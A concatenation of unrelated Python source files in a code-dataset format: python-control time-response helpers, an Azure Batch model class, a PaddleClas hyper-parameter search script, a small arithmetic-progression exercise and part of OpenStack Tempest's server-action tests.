            # NOTE(review): U is shared across loop iterations; this is
            # harmless only because every simo has the same dt -- confirm
            U[0] = 1./simo.dt  # unit area impulse
        # Simulate the impulse response fo this input
        response = forced_response(simo, T, U, new_X0)
        # Store the output (and states)
        inpidx = i if input is None else 0
        yout[:, inpidx, :] = response.y
        xout[:, inpidx, :] = response.x
    # Figure out if the system is SISO or not
    issiso = sys.issiso() or (input is not None and output is not None)
    # ``response`` is the last simulated trace; only its time vector is used
    return TimeResponseData(
        response.time, yout, xout, uout, issiso=issiso,
        transpose=transpose, return_x=return_x, squeeze=squeeze)
# utility function to find time period and time increment using pole locations
def _ideal_tfinal_and_dt(sys, is_step=True):
    """helper function to compute ideal simulation duration tfinal and dt, the
    time increment. Usually called by _default_time_vector, whose job it is to
    choose a realistic time vector. Considers both poles and zeros.
    For discrete-time models, dt is inherent and only tfinal is computed.
    Parameters
    ----------
    sys : StateSpace or TransferFunction
        The system whose time response is to be computed
    is_step : bool
        Scales the dc value by the magnitude of the nonzero mode since
        integrating the impulse response gives
        :math:`\\int e^{-\\lambda t} = -e^{-\\lambda t}/ \\lambda`
        Default is True.
    Returns
    -------
    tfinal : float
        The final time instance for which the simulation will be performed.
    dt : float
        The estimated sampling period for the simulation.
    Notes
    -----
    Just by evaluating the fastest mode for dt and slowest for tfinal often
    leads to unnecessary, bloated sampling (e.g., Transfer(1,[1,1001,1000]))
    since dt will be very small and tfinal will be too large though the fast
    mode hardly ever contributes. Similarly, change the numerator to [1, 2, 0]
    and the simulation would be unnecessarily long and the plot is virtually
    an L shape since the decay is so fast.
    Instead, a modal decomposition in time domain hence a truncated ZIR and ZSR
    can be used such that only the modes that have significant effect on the
    time response are taken. But the sensitivity of the eigenvalues complicate
    the matter since dlambda = <w, dA*v> with <w,v> = 1. Hence we can only work
    with simple poles with this formulation. See Golub, Van Loan Section 7.2.2
    for simple eigenvalue sensitivity about the nonunity of <w,v>. The size of
    the response is dependent on the size of the eigenshapes rather than the
    eigenvalues themselves.
    By Ilhan Polat, with modifications by Sawyer Fuller to integrate into
    python-control 2020.08.17
    """
    sqrt_eps = np.sqrt(np.spacing(1.))
    default_tfinal = 5  # Default simulation horizon
    default_dt = 0.1
    total_cycles = 5  # Number cycles for oscillating modes
    pts_per_cycle = 25  # Number points divide period of osc
    log_decay_percent = np.log(1000)  # Reduction factor for real pole decays
    # Static (gain-only) systems have no dynamics; use the defaults
    if sys._isstatic():
        tfinal = default_tfinal
        dt = sys.dt if isdtime(sys, strict=True) else default_dt
    elif isdtime(sys, strict=True):
        # Discrete time: dt is fixed by the model, estimate tfinal from the
        # pole locations (progressively masking out special pole classes)
        dt = sys.dt
        A = _convert_to_statespace(sys).A
        tfinal = default_tfinal
        p = eigvals(A)
        # Array Masks
        # unstable
        m_u = (np.abs(p) >= 1 + sqrt_eps)
        p_u, p = p[m_u], p[~m_u]
        if p_u.size > 0:
            # m_u is reused here to mark negative-real unstable poles
            m_u = (p_u.real < 0) & (np.abs(p_u.imag) < sqrt_eps)
            if np.any(~m_u):
                t_emp = np.max(
                    log_decay_percent / np.abs(np.log(p_u[~m_u]) / dt))
                tfinal = max(tfinal, t_emp)
        # zero - negligible effect on tfinal
        m_z = np.abs(p) < sqrt_eps
        p = p[~m_z]
        # Negative reals- treated as oscillary mode
        m_nr = (p.real < 0) & (np.abs(p.imag) < sqrt_eps)
        p_nr, p = p[m_nr], p[~m_nr]
        if p_nr.size > 0:
            t_emp = np.max(log_decay_percent / np.abs((np.log(p_nr)/dt).real))
            tfinal = max(tfinal, t_emp)
        # discrete integrators
        m_int = (p.real - 1 < sqrt_eps) & (np.abs(p.imag) < sqrt_eps)
        p_int, p = p[m_int], p[~m_int]
        # pure oscillatory modes
        m_w = (np.abs(np.abs(p) - 1) < sqrt_eps)
        p_w, p = p[m_w], p[~m_w]
        if p_w.size > 0:
            t_emp = total_cycles * 2 * np.pi / np.abs(np.log(p_w)/dt).min()
            tfinal = max(tfinal, t_emp)
        # Remaining (stable, non-special) poles: slowest decay sets tfinal
        if p.size > 0:
            t_emp = log_decay_percent / np.abs((np.log(p)/dt).real).min()
            tfinal = max(tfinal, t_emp)
        # Integrators never settle; stretch the horizon
        if p_int.size > 0:
            tfinal = tfinal * 5
    else:  # cont time
        sys_ss = _convert_to_statespace(sys)
        # Improve conditioning via balancing and zeroing tiny entries
        # See <w,v> for [[1,2,0], [9,1,0.01], [1,2,10*np.pi]]
        # before/after balance
        b, (sca, perm) = matrix_balance(sys_ss.A, separate=True)
        p, l, r = eig(b, left=True, right=True)
        # Reciprocal of inner product <w,v> for each eigval, (bound the
        # ~infs by 1e12)
        # G = Transfer([1], [1,0,1]) gives zero sensitivity (bound by 1e-12)
        eig_sens = np.reciprocal(maximum(1e-12, einsum('ij,ij->j', l, r).real))
        eig_sens = minimum(1e12, eig_sens)
        # Tolerances
        p[np.abs(p) < np.spacing(eig_sens * norm(b, 1))] = 0.
        # Incorporate balancing to outer factors
        l[perm, :] *= np.reciprocal(sca)[:, None]
        r[perm, :] *= sca[:, None]
        w, v = sys_ss.C @ r, l.T.conj() @ sys_ss.B
        origin = False
        # Computing the "size" of the response of each simple mode
        wn = np.abs(p)
        if np.any(wn == 0.):
            origin = True
        dc = np.zeros_like(p, dtype=float)
        # well-conditioned nonzero poles, np.abs just in case
        ok = np.abs(eig_sens) <= 1/sqrt_eps
        # the averaged t->inf response of each simple eigval on each i/o
        # channel. See, A = [[-1, k], [0, -2]], response sizes are
        # k-dependent (that is R/L eigenvector dependent)
        dc[ok] = norm(v[ok, :], axis=1)*norm(w[:, ok], axis=0)*eig_sens[ok]
        dc[wn != 0.] /= wn[wn != 0] if is_step else 1.
        dc[wn == 0.] = 0.
        # double the oscillating mode magnitude for the conjugate
        dc[p.imag != 0.] *= 2
        # Now get rid of noncontributing integrators and simple modes if any
        relevance = (dc > 0.1*dc.max()) | ~ok
        psub = p[relevance]
        wnsub = wn[relevance]
        # Collect per-mode candidates, then take max(tfinal)/min(dt) below
        tfinal, dt = [], []
        ints = wnsub == 0.
        iw = (psub.imag != 0.) & (np.abs(psub.real) <= sqrt_eps)
        # Pure imaginary?
        if np.any(iw):
            tfinal += (total_cycles * 2 * np.pi / wnsub[iw]).tolist()
            dt += (2 * np.pi / pts_per_cycle / wnsub[iw]).tolist()
        # The rest ~ts = log(%ss value) / exp(Re(eigval)t)
        texp_mode = log_decay_percent / np.abs(psub[~iw & ~ints].real)
        tfinal += texp_mode.tolist()
        dt += minimum(
            texp_mode / 50,
            (2 * np.pi / pts_per_cycle / wnsub[~iw & ~ints])
        ).tolist()
        # All integrators?
        if len(tfinal) == 0:
            return default_tfinal*5, default_dt*5
        tfinal = np.max(tfinal)*(5 if origin else 1)
        dt = np.min(dt)
    return tfinal, dt
def _default_time_vector(sys, N=None, tfinal=None, is_step=True):
    """Return a time vector with a reasonable number of points.

    For discrete-time systems the sample period is fixed by the model, so
    ``N`` is ignored and derived from ``tfinal`` instead.
    """
    max_points = 5000
    min_points_ct = 100   # floor for continuous-time simulations
    min_points_dt = 20    # discrete time often uses just a few samples
    ideal_tfinal, ideal_dt = _ideal_tfinal_and_dt(sys, is_step=is_step)
    if isdtime(sys, strict=True):
        # only need to use default_tfinal if not given; N is ignored.
        if tfinal is None:
            # derive the point count from the ideal horizon, then clip it
            N = int(np.clip(np.ceil(ideal_tfinal / sys.dt) + 1,
                            min_points_dt, max_points))
        else:
            N = int(np.ceil(tfinal / sys.dt)) + 1
        # snap tfinal to an integer multiple of the sample period
        tfinal = sys.dt * (N - 1)
    else:
        if tfinal is None:
            # simulate to the ideal horizon, but bound the point count
            tfinal = ideal_tfinal
        if N is None:
            N = int(np.clip(np.ceil(tfinal / ideal_dt) + 1,
                            min_points_ct, max_points))
    return np.linspace(0, tfinal, N, endpoint=True)
| 39.023358 | 84 | 0.618558 |
e3dfaac3be8985031a4476b2dbb55999aee86f00 | 1,953 | py | Python | azure-mgmt-batch/azure/mgmt/batch/models/application.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | 1 | 2017-10-29T15:14:35.000Z | 2017-10-29T15:14:35.000Z | azure-mgmt-batch/azure/mgmt/batch/models/application.py | Berryliao84/Python-Azure | a96ed6e8bbf4290372980a2919b31110da90b164 | [
"MIT"
] | null | null | null | azure-mgmt-batch/azure/mgmt/batch/models/application.py | Berryliao84/Python-Azure | a96ed6e8bbf4290372980a2919b31110da90b164 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Application(Model):
    """An application defined within an Azure Batch account.

    :param id: A string that uniquely identifies the application within the
     account.
    :type id: str
    :param display_name: The display name for the application.
    :type display_name: str
    :param packages: The list of packages under this application.
    :type packages: list of :class:`ApplicationPackage
     <azure.mgmt.batch.models.ApplicationPackage>`
    :param allow_updates: A value indicating whether packages within the
     application may be overwritten using the same version string.
    :type allow_updates: bool
    :param default_version: The package to use if a client requests the
     application but does not specify a version.
    :type default_version: str
    """

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'packages': {'key': 'packages', 'type': '[ApplicationPackage]'},
        'allow_updates': {'key': 'allowUpdates', 'type': 'bool'},
        'default_version': {'key': 'defaultVersion', 'type': 'str'},
    }

    def __init__(self, id=None, display_name=None, packages=None, allow_updates=None, default_version=None):
        # Assign every constructor argument to the matching attribute
        for attr_name, attr_value in (('id', id),
                                      ('display_name', display_name),
                                      ('packages', packages),
                                      ('allow_updates', allow_updates),
                                      ('default_version', default_version)):
            setattr(self, attr_name, attr_value)
| 40.6875 | 108 | 0.640041 |
abc406167946c82604f2e58f3835d4a37bbb694d | 5,289 | py | Python | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | 1 | 2020-04-08T02:45:06.000Z | 2020-04-08T02:45:06.000Z | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | null | null | null | tools/search_strategy.py | PaddlePaddle/PaddleCLS | 22531707527fb01f0e7f628509ed4b3d2b860316 | [
"Apache-2.0"
] | 1 | 2020-04-07T17:03:24.000Z | 2020-04-07T17:03:24.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.abspath(os.path.join(__dir__, '../')))
import subprocess
import numpy as np
from ppcls.utils import config
def get_result(log_dir):
    """Parse the best metric value from the training log in *log_dir*.

    Reads ``<log_dir>/train.log`` and extracts the number following the
    last ``best metric: <value>]`` marker written by the trainer.
    """
    with open("{}/train.log".format(log_dir), "r") as log:
        contents = log.read()
    # rpartition keeps only the text after the *last* marker occurrence
    _, _, tail = contents.rpartition("best metric: ")
    return float(tail.split("]")[0])
def search_train(search_list,
                 base_program,
                 base_output_dir,
                 search_key,
                 config_replace_value,
                 model_name,
                 search_times=1):
    """Launch training once per candidate value and report the best one.

    Parameters
    ----------
    search_list : list
        Candidate values for the hyper-parameter being searched.
    base_program : list of str
        Command-line prefix used to launch each training run.
    base_output_dir : str
        Root directory under which per-run output directories are created.
    search_key : str
        Name of the searched hyper-parameter (used in output dir names).
    config_replace_value : list of str
        Config keys to override with the candidate value for every run.
    model_name : str
        Architecture name used to locate the train log; replaced by the
        candidate value when ``Arch.name`` is among the overridden keys.
    search_times : int, optional
        Number of repeated runs per candidate; results are averaged.

    Returns
    -------
    dict
        Maps each candidate (stringified) to its list of results and adds
        a ``"best"`` entry holding the best-performing candidate value.
    """
    best_res = 0.
    best = search_list[0]
    all_result = {}
    for search_i in search_list:
        program = base_program.copy()
        for v in config_replace_value:
            program += ["-o", "{}={}".format(v, search_i)]
            if v == "Arch.name":
                model_name = search_i
        res_list = []
        for j in range(search_times):
            output_dir = "{}/{}_{}_{}".format(base_output_dir, search_key,
                                              search_i, j).replace(".", "_")
            # Bug fix: use a fresh per-run copy instead of mutating
            # ``program`` in place, which previously appended a duplicate
            # "-o Global.output_dir=..." pair on every repetition.
            run_program = program + [
                "-o", "Global.output_dir={}".format(output_dir)
            ]
            process = subprocess.Popen(run_program)
            process.communicate()
            res = get_result("{}/{}".format(output_dir, model_name))
            res_list.append(res)
        all_result[str(search_i)] = res_list
        if np.mean(res_list) > best_res:
            best = search_i
            best_res = np.mean(res_list)
    all_result["best"] = best
    return all_result
def search_strategy():
    """Run the full hyper-parameter search described by the YAML config.

    Reads the search configuration from the CLI, grid-searches each entry of
    ``search_dict`` (folding the winner of every round into the base command),
    optionally searches a distillation teacher, and finally launches one last
    training run with every best value applied.
    """
    args = config.parse_args()
    configs = config.get_config(
        args.config, overrides=args.override, show=False)
    base_config_file = configs["base_config_file"]
    # May be None; only dereferenced in the final replace loop, which is
    # reached only when a teacher section exists.
    distill_config_file = configs.get("distill_config_file", None)

    model_name = config.get_config(base_config_file)["Arch"]["name"]
    gpus = configs["gpus"]
    gpus = ",".join([str(i) for i in gpus])
    # Base argv for one distributed training run; later rounds append
    # "-o key=value" overrides to it in place.
    base_program = [
        "python3.7", "-m", "paddle.distributed.launch",
        "--gpus={}".format(gpus), "tools/train.py", "-c", base_config_file
    ]
    base_output_dir = configs["output_dir"]
    search_times = configs["search_times"]
    search_dict = configs.get("search_dict")
    all_results = {}
    for search_i in search_dict:
        search_key = search_i["search_key"]
        search_values = search_i["search_values"]
        replace_config = search_i["replace_config"]
        res = search_train(search_values, base_program, base_output_dir,
                           search_key, replace_config, model_name,
                           search_times)
        all_results[search_key] = res
        best = res.get("best")
        # Bake the winning value into the command used by later rounds.
        for v in replace_config:
            base_program += ["-o", "{}={}".format(v, best)]

    teacher_configs = configs.get("teacher", None)
    if teacher_configs is None:
        # No distillation requested: report results and stop here.
        print(all_results, base_program)
        return

    algo = teacher_configs.get("algorithm", "skl-ugi")
    supported_list = ["skl-ugi", "udml"]
    assert algo in supported_list, f"algorithm must be in {supported_list} but got {algo}"

    if algo == "skl-ugi":
        teacher_program = base_program.copy()
        # remove incompatible keys
        teacher_rm_keys = teacher_configs["rm_keys"]
        rm_indices = []
        for rm_k in teacher_rm_keys:
            for ind, ki in enumerate(base_program):
                if rm_k in ki:
                    rm_indices.append(ind)
        # Pop from the back so earlier indices stay valid; each matched
        # "-o key=value" argument is removed together with its "-o" flag.
        for rm_index in rm_indices[::-1]:
            teacher_program.pop(rm_index)
            teacher_program.pop(rm_index - 1)

        replace_config = ["Arch.name"]
        teacher_list = teacher_configs["search_values"]
        res = search_train(teacher_list, teacher_program, base_output_dir,
                           "teacher", replace_config, model_name)
        all_results["teacher"] = res
        best = res.get("best")
        # Path of run 0 of the winning teacher, as laid out by search_train.
        t_pretrained = "{}/{}_{}_0/{}/best_model".format(base_output_dir,
                                                         "teacher", best, best)
        base_program += [
            "-o", "Arch.models.0.Teacher.name={}".format(best), "-o",
            "Arch.models.0.Teacher.pretrained={}".format(t_pretrained)
        ]
    elif algo == "udml":
        if "lr_mult_list" in all_results:
            base_program += [
                "-o", "Arch.models.0.Teacher.lr_mult_list={}".format(
                    all_results["lr_mult_list"]["best"])
            ]

    output_dir = "{}/search_res".format(base_output_dir)
    base_program += ["-o", "Global.output_dir={}".format(output_dir)]
    final_replace = configs.get('final_replace')
    # Switch the command from the plain config to the distillation config,
    # then apply every textual substitution requested in final_replace.
    for i in range(len(base_program)):
        base_program[i] = base_program[i].replace(base_config_file,
                                                  distill_config_file)
        for k in final_replace:
            v = final_replace[k]
            base_program[i] = base_program[i].replace(k, v)

    process = subprocess.Popen(base_program)
    process.communicate()
    print(all_results, base_program)
if __name__ == '__main__':
    # CLI entry point: run the whole hyper-parameter search end to end.
    search_strategy()
| 37.246479 | 90 | 0.589525 |
a3f6486648a7c43a7119e885d12840c7fcdaf276 | 197 | py | Python | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | 51.py | renato-felix/PythonCursoEmVideo | 267b862c7afdde6d5f7e630e0a203fe923ca74a8 | [
"MIT"
] | null | null | null | a1 = int(input('Digite o primeiro termo da PA: '))
r = int(input('Digite a razão da PA: '))
an = 0
n = 0
for c in range(1, 11):
an = an + 1
n = n + 1
pa = a1 + (n - 1) * r
print(pa) | 21.888889 | 50 | 0.507614 |
deb21c72606c9f0ffc9e3e7757593eb82973bb72 | 36,593 | py | Python | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | tempest/api/compute/servers/test_server_actions.py | AurelienLourot/tempest | 4d14a22a1a0eb7aaa4aafb917273baa0739f55c3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from urllib import parse as urlparse
from oslo_log import log as logging
import testtools
from tempest.api.compute import base
from tempest.common import compute
from tempest.common import utils
from tempest.common.utils.linux import remote_client
from tempest.common import waiters
from tempest import config
from tempest.lib.common import api_version_utils
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ServerActionsTestJSON(base.BaseV2ComputeTest):
"""Test server actions"""
def setUp(self):
# NOTE(afazekas): Normally we use the same server with all test cases,
# but if it has an issue, we build a new one
super(ServerActionsTestJSON, self).setUp()
# Check if the server is in a clean state after test
try:
waiters.wait_for_server_status(self.client,
self.server_id, 'ACTIVE')
except lib_exc.NotFound:
# The server was deleted by previous test, create a new one
# Use class level validation resources to avoid them being
# deleted once a test is over
validation_resources = self.get_class_validation_resources(
self.os_primary)
server = self.create_test_server(
validatable=True,
validation_resources=validation_resources,
wait_until='ACTIVE')
self.__class__.server_id = server['id']
except Exception:
# Rebuild server if something happened to it during a test
self.__class__.server_id = self.recreate_server(
self.server_id, validatable=True)
def tearDown(self):
super(ServerActionsTestJSON, self).tearDown()
# NOTE(zhufl): Because server_check_teardown will raise Exception
# which will prevent other cleanup steps from being executed, so
# server_check_teardown should be called after super's tearDown.
self.server_check_teardown()
@classmethod
def setup_credentials(cls):
cls.prepare_instance_network()
super(ServerActionsTestJSON, cls).setup_credentials()
@classmethod
def setup_clients(cls):
super(ServerActionsTestJSON, cls).setup_clients()
cls.client = cls.servers_client
@classmethod
def resource_setup(cls):
super(ServerActionsTestJSON, cls).resource_setup()
cls.server_id = cls.recreate_server(None, validatable=True)
@decorators.idempotent_id('6158df09-4b82-4ab3-af6d-29cf36af858d')
@testtools.skipUnless(CONF.compute_feature_enabled.change_password,
'Change password not available.')
def test_change_server_password(self):
"""Test changing server's password
The server's password should be set to the provided password and
the user can authenticate with the new password.
"""
# Since this test messes with the password and makes the
# server unreachable, it should create its own server
validation_resources = self.get_test_validation_resources(
self.os_primary)
newserver = self.create_test_server(
validatable=True,
validation_resources=validation_resources,
wait_until='ACTIVE')
self.addCleanup(self.delete_server, newserver['id'])
# The server's password should be set to the provided password
new_password = 'Newpass1234'
self.client.change_password(newserver['id'], adminPass=new_password)
waiters.wait_for_server_status(self.client, newserver['id'], 'ACTIVE')
if CONF.validation.run_validation:
# Verify that the user can authenticate with the new password
server = self.client.show_server(newserver['id'])['server']
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
new_password,
server=server,
servers_client=self.client)
linux_client.validate_authentication()
def _test_reboot_server(self, reboot_type):
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
# Get the time the server was last rebooted,
server = self.client.show_server(self.server_id)['server']
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
self.password,
validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
boot_time = linux_client.get_boot_time()
# NOTE: This sync is for avoiding the loss of pub key data
# in a server
linux_client.exec_command("sync")
self.client.reboot_server(self.server_id, type=reboot_type)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
if CONF.validation.run_validation:
# Log in and verify the boot time has changed
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
self.password,
validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
new_boot_time = linux_client.get_boot_time()
self.assertGreater(new_boot_time, boot_time,
'%s > %s' % (new_boot_time, boot_time))
@decorators.attr(type='smoke')
@decorators.idempotent_id('2cb1baf6-ac8d-4429-bf0d-ba8a0ba53e32')
def test_reboot_server_hard(self):
"""Test hard rebooting server
The server should be power cycled.
"""
self._test_reboot_server('HARD')
@decorators.idempotent_id('1d1c9104-1b0a-11e7-a3d4-fa163e65f5ce')
def test_remove_server_all_security_groups(self):
"""Test removing all security groups from server"""
server = self.create_test_server(wait_until='ACTIVE')
# Remove all Security group
self.client.remove_security_group(
server['id'], name=server['security_groups'][0]['name'])
# Verify all Security group
server = self.client.show_server(server['id'])['server']
self.assertNotIn('security_groups', server)
def _rebuild_server_and_check(self, image_ref):
rebuilt_server = (self.client.rebuild_server(self.server_id, image_ref)
['server'])
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
msg = ('Server was not rebuilt to the original image. '
'The original image: {0}. The current image: {1}'
.format(image_ref, rebuilt_server['image']['id']))
self.assertEqual(image_ref, rebuilt_server['image']['id'], msg)
def _test_rebuild_server(self):
# Get the IPs the server has before rebuilding it
original_addresses = (self.client.show_server(self.server_id)['server']
['addresses'])
# The server should be rebuilt using the provided image and data
meta = {'rebuild': 'server'}
new_name = data_utils.rand_name(self.__class__.__name__ + '-server')
password = 'rebuildPassw0rd'
rebuilt_server = self.client.rebuild_server(
self.server_id,
self.image_ref_alt,
name=new_name,
metadata=meta,
adminPass=password)['server']
# If the server was rebuilt on a different image, restore it to the
# original image once the test ends
if self.image_ref_alt != self.image_ref:
self.addCleanup(self._rebuild_server_and_check, self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assert_flavor_equal(self.flavor_ref, rebuilt_server['flavor'])
# Verify the server properties after the rebuild completes
waiters.wait_for_server_status(self.client,
rebuilt_server['id'], 'ACTIVE')
server = self.client.show_server(rebuilt_server['id'])['server']
rebuilt_image_id = server['image']['id']
self.assertTrue(self.image_ref_alt.endswith(rebuilt_image_id))
self.assertEqual(new_name, server['name'])
self.assertEqual(original_addresses, server['addresses'])
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
# Authentication is attempted in the following order of priority:
# 1.The key passed in, if one was passed in.
# 2.Any key we can find through an SSH agent (if allowed).
# 3.Any "id_rsa", "id_dsa" or "id_ecdsa" key discoverable in
# ~/.ssh/ (if allowed).
# 4.Plain username/password auth, if a password was given.
linux_client = remote_client.RemoteClient(
self.get_server_ip(rebuilt_server, validation_resources),
self.ssh_alt_user,
password,
validation_resources['keypair']['private_key'],
server=rebuilt_server,
servers_client=self.client)
linux_client.validate_authentication()
@decorators.idempotent_id('aaa6cdf3-55a7-461a-add9-1c8596b9a07c')
def test_rebuild_server(self):
"""Test rebuilding server
The server should be rebuilt using the provided image and data.
"""
self._test_rebuild_server()
@decorators.idempotent_id('30449a88-5aff-4f9b-9866-6ee9b17f906d')
def test_rebuild_server_in_stop_state(self):
"""Test rebuilding server in stop state
The server in stop state should be rebuilt using the provided
image and remain in SHUTOFF state.
"""
server = self.client.show_server(self.server_id)['server']
old_image = server['image']['id']
new_image = (self.image_ref_alt
if old_image == self.image_ref else self.image_ref)
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
rebuilt_server = (self.client.rebuild_server(self.server_id, new_image)
['server'])
# If the server was rebuilt on a different image, restore it to the
# original image once the test ends
if self.image_ref_alt != self.image_ref:
self.addCleanup(self._rebuild_server_and_check, old_image)
# Verify the properties in the initial response are correct
self.assertEqual(self.server_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.assert_flavor_equal(self.flavor_ref, rebuilt_server['flavor'])
# Verify the server properties after the rebuild completes
waiters.wait_for_server_status(self.client,
rebuilt_server['id'], 'SHUTOFF')
server = self.client.show_server(rebuilt_server['id'])['server']
rebuilt_image_id = server['image']['id']
self.assertEqual(new_image, rebuilt_image_id)
self.client.start_server(self.server_id)
# NOTE(mriedem): Marked as slow because while rebuild and volume-backed is
# common, we don't actually change the image (you can't with volume-backed
# rebuild) so this isn't testing much outside normal rebuild
# (and it's slow).
@decorators.attr(type='slow')
@decorators.idempotent_id('b68bd8d6-855d-4212-b59b-2e704044dace')
@utils.services('volume')
def test_rebuild_server_with_volume_attached(self):
"""Test rebuilding server with volume attached
The volume should be attached to the instance after rebuild.
"""
# create a new volume and attach it to the server
volume = self.create_volume()
server = self.client.show_server(self.server_id)['server']
self.attach_volume(server, volume)
# run general rebuild test
self._test_rebuild_server()
# make sure the volume is attached to the instance after rebuild
vol_after_rebuild = self.volumes_client.show_volume(volume['id'])
vol_after_rebuild = vol_after_rebuild['volume']
self.assertEqual('in-use', vol_after_rebuild['status'])
self.assertEqual(self.server_id,
vol_after_rebuild['attachments'][0]['server_id'])
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_alt_user,
password=None,
pkey=validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
linux_client.validate_authentication()
def _test_resize_server_confirm(self, server_id, stop=False):
# The server's RAM and disk space should be modified to that of
# the provided flavor
if stop:
self.client.stop_server(server_id)
waiters.wait_for_server_status(self.client, server_id,
'SHUTOFF')
self.client.resize_server(server_id, self.flavor_ref_alt)
# NOTE(jlk): Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, server_id)
waiters.wait_for_server_status(self.client, server_id,
'VERIFY_RESIZE')
self.client.confirm_resize_server(server_id)
expected_status = 'SHUTOFF' if stop else 'ACTIVE'
waiters.wait_for_server_status(self.client, server_id,
expected_status)
server = self.client.show_server(server_id)['server']
self.assert_flavor_equal(self.flavor_ref_alt, server['flavor'])
if stop:
# NOTE(mriedem): tearDown requires the server to be started.
self.client.start_server(server_id)
@decorators.idempotent_id('1499262a-9328-4eda-9068-db1ac57498d2')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_confirm(self):
"""Test resizing server and then confirming"""
self._test_resize_server_confirm(self.server_id, stop=False)
@decorators.idempotent_id('e6c28180-7454-4b59-b188-0257af08a63b')
@decorators.related_bug('1728603')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@utils.services('volume')
def test_resize_volume_backed_server_confirm(self):
"""Test resizing a volume backed server and then confirming"""
# We have to create a new server that is volume-backed since the one
# from setUp is not volume-backed.
kwargs = {'volume_backed': True,
'wait_until': 'ACTIVE'}
if CONF.validation.run_validation:
validation_resources = self.get_test_validation_resources(
self.os_primary)
kwargs.update({'validatable': True,
'validation_resources': validation_resources})
server = self.create_test_server(**kwargs)
# NOTE(mgoddard): Get detailed server to ensure addresses are present
# in fixed IP case.
server = self.servers_client.show_server(server['id'])['server']
self._test_resize_server_confirm(server['id'])
if CONF.compute_feature_enabled.console_output:
# Now do something interactive with the guest like get its console
# output; we don't actually care about the output,
# just that it doesn't raise an error.
self.client.get_console_output(server['id'])
if CONF.validation.run_validation:
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
password=None,
pkey=validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
linux_client.validate_authentication()
@decorators.idempotent_id('138b131d-66df-48c9-a171-64f45eb92962')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_confirm_from_stopped(self):
"""Test resizing a stopped server and then confirming"""
self._test_resize_server_confirm(self.server_id, stop=True)
@decorators.idempotent_id('c03aab19-adb1-44f5-917d-c419577e9e68')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_revert(self):
"""Test resizing server and then reverting
The server's RAM and disk space should return to its original
values after a resize is reverted.
"""
self.client.resize_server(self.server_id, self.flavor_ref_alt)
# NOTE(zhufl): Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, self.server_id)
waiters.wait_for_server_status(self.client, self.server_id,
'VERIFY_RESIZE')
self.client.revert_resize_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
server = self.client.show_server(self.server_id)['server']
